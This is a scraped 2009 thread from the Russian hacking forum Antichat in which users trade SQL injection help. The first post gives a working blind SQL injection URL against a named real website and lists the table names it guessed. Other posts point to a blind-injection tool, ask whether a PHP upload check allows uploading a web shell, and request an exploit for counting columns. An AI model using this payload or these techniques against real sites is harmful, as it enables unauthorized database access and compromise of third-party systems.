Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
08.12.2009, 22:04
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://podium.md/news_show.php?id=33+AND+1=(SELECT+1+FROM+admin+LIM IT+0,1)--
методом тыка угадал таблы
admin,news,user
|
|
|
08.12.2009, 22:12
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
попробуй эту софтиу для слепых иньекций www.darkc0de.com/others/blindext.py
тама дето и хелп к ней лежал
|
|
|
|
08.12.2009, 22:22
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Код:
$filename = $_FILES['userfile']['name'];
if ($filename == 'ass.gif')
{
copy($_FILES['userfile']['tmp_name'], $uploadfile);
}
Уязвим ли этот кусок кода? К заливке шелла(файла) с расширением php
я считаю что нет... а пёс его знает, лучше спрошу у знатоков. |
|
|
|
08.12.2009, 23:08
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
маловато кода выложил, где $uploadfile и форма загрузки - непонятно
|
|
|
|
08.12.2009, 23:23
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Сообщение от Pashkela
маловато кода выложил, где $uploadfile и форма загрузки - непонятно
Код полный.
$uploadfile может быть что угодно. как
$uploadfile = 'file.lol';
так и $uploadfile = $filename;
не в нём смысл.
|
|
|
|
09.12.2009, 06:09
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879
Репутация:
5
|
|
Подскажите пожалуйста, можно ли как то обойти следующее в SQL
Select a from DB-nomer1.user - примерный запрос
Проблема в экранировании тере "-" и в итоге получаю ошибку
Какие есть возможности?
Последний раз редактировалось jangle; 09.12.2009 в 06:14..
|
|
|
|
09.12.2009, 06:24
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Nightmarе
Код:
$filename = $_FILES['userfile']['name'];
if ($filename == 'ass.gif')
{
copy($_FILES['userfile']['tmp_name'], $uploadfile);
}
Уязвим ли этот кусок кода? К заливке шелла(файла) с расширением php
я считаю что нет... а пёс его знает, лучше спрошу у знатоков. Нет.
|
|
|
|
09.12.2009, 06:55
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Сообщение от jangle
Подскажите пожалуйста, можно ли как то обойти следующее в SQL
Select a from DB-nomer1.user - примерный запрос
Проблема в экранировании тере "-" и в итоге получаю ошибку
Какие есть возможности?
взять имя БД в обратные кавычки `DB-nomer1`.user, если они не фильтруются, то должно сработать.
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|
|
09.12.2009, 07:21
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
Провел на форуме:
95879
Репутация:
5
|
|
2 Ded MustD!e - Thx, помогло!!!
|
|
|
|
09.12.2009, 07:28
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
извините за вопрос ест какой то софт или ехплоит для знать сколько columns
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
